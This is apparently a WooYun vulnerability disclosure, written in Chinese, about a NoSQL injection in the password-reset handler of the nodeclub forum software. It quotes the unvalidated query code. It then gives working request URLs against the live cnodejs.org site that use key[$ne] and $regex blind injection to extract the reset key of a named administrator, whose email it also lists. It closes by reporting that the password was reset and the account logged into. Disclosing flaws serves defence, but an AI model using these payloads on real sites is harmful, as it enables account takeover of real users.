WooYun.org

这个nodeclub(https://github.com/cnodejs/nodeclub/)可能用的人不多，弄着玩一下
从github上下载nodeclub的源码。
\controllers\sign.js

exports.reset_pass = function (req, res, next) {
  var key = req.query.key;
  var name = req.query.name;
  User.getUserByNameAndKey(name, key, function (err, user) {
    if (!user) {
      res.status(403);
      return res.render('notify/notify', {error: '信息有误，密码无法重置。'});
    }

可以看到，key和name未经判断进入了 User的 getUserByNameAndKey
\proxy\user.js

exports.getUserByNameAndKey = function (loginname, key, callback) {
  User.findOne({loginname: loginname, retrieve_key: key}, callback);
};

为了测试这个问题，首先，我们把目标定为 cnodejs 的管理者之一 alsotang，从他的github上可以知道他的邮箱是 alsotang@gmail.com
然后在
https://cnodejs.org/search_pass
找回密码，

接着，根据之前的问题，不难简单的构造出以下请求。
https://cnodejs.org/reset_pass?name=alsotang&key[$ne]=111111111
其中，name是目标用户名，让key不等于1111111，
此时会返回一个正常的页面。

如果，我们随便设置一个key，例如：
https://cnodejs.org/reset_pass?name=alsotang&key=111111111
则会返回一个错误的页面：

如此一来，我们就可以对key参数通过 $regex来进行盲注。
例如：
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5
返回正常
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^6
返回错误
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5f
返回正常
....
测试代码：
见“测试代码”部分。
运行程序后，

跑出的key:

然后拿着key去重置密码，密码被重置为 wooyun，登录后～～